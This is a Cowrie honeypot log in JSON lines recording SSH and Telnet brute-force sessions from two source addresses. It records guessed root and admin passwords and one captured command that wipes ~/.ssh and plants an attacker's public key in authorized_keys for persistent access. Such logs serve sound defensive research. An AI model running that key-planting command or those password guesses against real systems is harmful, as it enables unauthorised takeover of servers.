{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":21352,"dst_ip":"1.2.3.4","dst_port":22,"session":"258d0a307254","protocol":"ssh","message":"New connection: 212.227.235.229:21352 (1.2.3.4:22) [session: 258d0a307254]","sensor":"my-vps","timestamp":"2025-08-28T16:23:09.770090Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:23:09.771025Z","src_ip":"212.227.235.229","session":"258d0a307254"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:23:09.929071Z","src_ip":"212.227.235.229","session":"258d0a307254"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:23:10.602703Z","src_ip":"212.227.235.229","session":"258d0a307254"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:23:10.762653Z","src_ip":"212.227.235.229","session":"258d0a307254"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:23:10.778217Z","src_ip":"212.227.235.229","session":"ef8eb37da3ed"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":49214,"dst_ip":"1.2.3.4","dst_port":23,"session":"3effd716e6d7","protocol":"telnet","message":"New connection: 212.227.125.160:49214 (1.2.3.4:23) [session: 3effd716e6d7]","sensor":"my-vps","timestamp":"2025-08-28T16:24:01.957977Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T16:24:02.204842Z","src_ip":"212.227.125.160","session":"3effd716e6d7"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T16:24:03.483143Z","src_ip":"212.227.125.160","session":"3effd716e6d7"}
{"eventid":"cowrie.session.closed","duration":2.643136501312256,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:24:04.601037Z","src_ip":"212.227.125.160","session":"3effd716e6d7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54264,"dst_ip":"1.2.3.4","dst_port":23,"session":"fba0a05632bc","protocol":"telnet","message":"New connection: 212.227.125.160:54264 (1.2.3.4:23) [session: fba0a05632bc]","sensor":"my-vps","timestamp":"2025-08-28T16:24:04.700187Z"}
{"eventid":"cowrie.session.closed","duration":1.597914457321167,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:24:06.298035Z","src_ip":"212.227.125.160","session":"fba0a05632bc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54278,"dst_ip":"1.2.3.4","dst_port":23,"session":"008a9d99d2b4","protocol":"telnet","message":"New connection: 212.227.125.160:54278 (1.2.3.4:23) [session: 008a9d99d2b4]","sensor":"my-vps","timestamp":"2025-08-28T16:24:06.396425Z"}
{"eventid":"cowrie.session.closed","duration":1.6573829650878906,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:24:08.052909Z","src_ip":"212.227.125.160","session":"008a9d99d2b4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54292,"dst_ip":"1.2.3.4","dst_port":23,"session":"105fcf5ba125","protocol":"telnet","message":"New connection: 212.227.125.160:54292 (1.2.3.4:23) [session: 105fcf5ba125]","sensor":"my-vps","timestamp":"2025-08-28T16:24:08.159524Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-28T16:24:08.427225Z","src_ip":"212.227.125.160","session":"105fcf5ba125"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-28T16:24:09.708521Z","src_ip":"212.227.125.160","session":"105fcf5ba125"}
{"eventid":"cowrie.session.closed","duration":2.6671457290649414,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:24:10.826584Z","src_ip":"212.227.125.160","session":"105fcf5ba125"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54298,"dst_ip":"1.2.3.4","dst_port":23,"session":"4c052bc488a4","protocol":"telnet","message":"New connection: 212.227.125.160:54298 (1.2.3.4:23) [session: 4c052bc488a4]","sensor":"my-vps","timestamp":"2025-08-28T16:24:10.925620Z"}
{"eventid":"cowrie.session.closed","duration":1.2457327842712402,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:24:12.171274Z","src_ip":"212.227.125.160","session":"4c052bc488a4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54300,"dst_ip":"1.2.3.4","dst_port":23,"session":"233767663586","protocol":"telnet","message":"New connection: 212.227.125.160:54300 (1.2.3.4:23) [session: 233767663586]","sensor":"my-vps","timestamp":"2025-08-28T16:24:12.277005Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"VnT3ch@dm1n","message":"login attempt [admin/VnT3ch@dm1n] failed","sensor":"my-vps","timestamp":"2025-08-28T16:24:14.114208Z","src_ip":"212.227.125.160","session":"233767663586"}
{"eventid":"cowrie.session.closed","duration":3.9958269596099854,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:24:16.272769Z","src_ip":"212.227.125.160","session":"233767663586"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44094,"dst_ip":"1.2.3.4","dst_port":23,"session":"a73e80b1e282","protocol":"telnet","message":"New connection: 212.227.125.160:44094 (1.2.3.4:23) [session: a73e80b1e282]","sensor":"my-vps","timestamp":"2025-08-28T16:24:16.378277Z"}
{"eventid":"cowrie.session.closed","duration":1.0819501876831055,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:24:17.460148Z","src_ip":"212.227.125.160","session":"a73e80b1e282"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44108,"dst_ip":"1.2.3.4","dst_port":23,"session":"8902a0a836c5","protocol":"telnet","message":"New connection: 212.227.125.160:44108 (1.2.3.4:23) [session: 8902a0a836c5]","sensor":"my-vps","timestamp":"2025-08-28T16:24:17.558098Z"}
{"eventid":"cowrie.login.success","username":"root","password":"86981198","message":"login attempt [root/86981198] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:24:19.410922Z","src_ip":"212.227.125.160","session":"8902a0a836c5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:24:19.426303Z","src_ip":"212.227.125.160","session":"8902a0a836c5"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-28T16:24:19.559264Z","src_ip":"212.227.125.160","session":"8902a0a836c5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.2","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:24:20.588433Z","src_ip":"212.227.125.160","session":"8902a0a836c5"}
{"eventid":"cowrie.session.closed","duration":3.033782958984375,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:24:20.591793Z","src_ip":"212.227.125.160","session":"8902a0a836c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51310,"dst_ip":"1.2.3.4","dst_port":22,"session":"2a4befa6c5b0","protocol":"ssh","message":"New connection: 212.227.235.229:51310 (1.2.3.4:22) [session: 2a4befa6c5b0]","sensor":"my-vps","timestamp":"2025-08-28T16:26:00.241966Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T16:26:00.243111Z","src_ip":"212.227.235.229","session":"2a4befa6c5b0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40090,"dst_ip":"1.2.3.4","dst_port":22,"session":"5708c0d46397","protocol":"ssh","message":"New connection: 212.227.235.229:40090 (1.2.3.4:22) [session: 5708c0d46397]","sensor":"my-vps","timestamp":"2025-08-28T16:26:00.408187Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:26:00.409046Z","src_ip":"212.227.235.229","session":"5708c0d46397"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T16:26:00.514562Z","src_ip":"212.227.235.229","session":"2a4befa6c5b0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:26:00.527278Z","src_ip":"212.227.235.229","session":"5708c0d46397"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin.123","message":"login attempt [root/Admin.123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:26:01.049476Z","src_ip":"212.227.235.229","session":"5708c0d46397"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:26:01.306491Z","src_ip":"212.227.235.229","session":"5708c0d46397"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:26:01.307627Z","src_ip":"212.227.235.229","session":"5708c0d46397"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T16:26:01.308910Z","src_ip":"212.227.235.229","session":"5708c0d46397"}
{"eventid":"cowrie.login.success","username":"root","password":"101010","message":"login attempt [root/101010] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:26:01.331639Z","src_ip":"212.227.235.229","session":"2a4befa6c5b0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:26:01.433985Z","src_ip":"212.227.235.229","session":"5708c0d46397"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:26:02.189857Z","src_ip":"212.227.235.229","session":"5708c0d46397"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T16:26:02.190627Z","src_ip":"212.227.235.229","session":"5708c0d46397"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T16:26:02.212864Z","src_ip":"212.227.235.229","session":"2a4befa6c5b0"}
{"eventid":"cowrie.command.input","input":"ssh -V","message":"CMD: ssh -V","sensor":"my-vps","timestamp":"2025-08-28T16:26:02.213567Z","src_ip":"212.227.235.229","session":"2a4befa6c5b0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T16:26:02.310956Z","src_ip":"212.227.235.229","session":"5708c0d46397"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:26:02.311835Z","src_ip":"212.227.235.229","session":"5708c0d46397"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40590,"dst_ip":"1.2.3.4","dst_port":22,"session":"eff779cb336a","protocol":"ssh","message":"New connection: 212.227.235.229:40590 (1.2.3.4:22) [session: eff779cb336a]","sensor":"my-vps","timestamp":"2025-08-28T16:26:02.425681Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:26:02.426630Z","src_ip":"212.227.235.229","session":"eff779cb336a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","size":58,"shasum":"8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:26:02.485284Z","src_ip":"212.227.235.229","session":"2a4befa6c5b0"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:26:02.486412Z","src_ip":"212.227.235.229","session":"2a4befa6c5b0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:26:02.542814Z","src_ip":"212.227.235.229","session":"eff779cb336a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T16:26:03.050300Z","src_ip":"212.227.235.229","session":"eff779cb336a"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:26:04.171231Z","src_ip":"212.227.235.229","session":"eff779cb336a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41016,"dst_ip":"1.2.3.4","dst_port":22,"session":"f8145b4c8e7d","protocol":"ssh","message":"New connection: 212.227.235.229:41016 (1.2.3.4:22) [session: f8145b4c8e7d]","sensor":"my-vps","timestamp":"2025-08-28T16:26:04.283562Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T16:26:04.286333Z","src_ip":"212.227.235.229","session":"f8145b4c8e7d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T16:26:04.399526Z","src_ip":"212.227.235.229","session":"f8145b4c8e7d"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T16:26:04.861193Z","src_ip":"212.227.235.229","session":"f8145b4c8e7d"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:26:04.976834Z","src_ip":"212.227.235.229","session":"f8145b4c8e7d"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T16:26:04.978212Z","src_ip":"212.227.235.229","session":"5708c0d46397"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":54930,"dst_ip":"1.2.3.4","dst_port":22,"session":"ce4bdc9e8cad","protocol":"ssh","message":"New connection: 212.227.125.160:54930 (1.2.3.4:22) [session: ce4bdc9e8cad]","sensor":"my-vps","timestamp":"2025-08-28T16:26:37.390750Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T16:26:37.391840Z","src_ip":"212.227.125.160","session":"ce4bdc9e8cad"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T16:26:37.450349Z","src_ip":"212.227.125.160","session":"ce4bdc9e8cad"}
{"eventid":"cowrie.login.failed","username":"admin","password":"29121993","message":"login attempt [admin/29121993] failed","sensor":"my-vps","timestamp":"2025-08-28T16:26:37.729458Z","src_ip":"212.227.125.160","session":"ce4bdc9e8cad"}
{"eventid":"cowrie.login.failed","username":"admin","password":"29111980","message":"login attempt [admin/29111980] failed","sensor":"my-vps","timestamp":"2025-08-28T16:26:39.057999Z","src_ip":"212.227.125.160","session":"ce4bdc9e8cad"}
{"eventid":"cowrie.login.failed","username":"admin","password":"29101993","message":"login attempt [admin/29101993] failed","sensor":"my-vps","timestamp":"2025-08-28T16:26:40.120725Z","src_ip":"212.227.125.160","session":"ce4bdc9e8cad"}
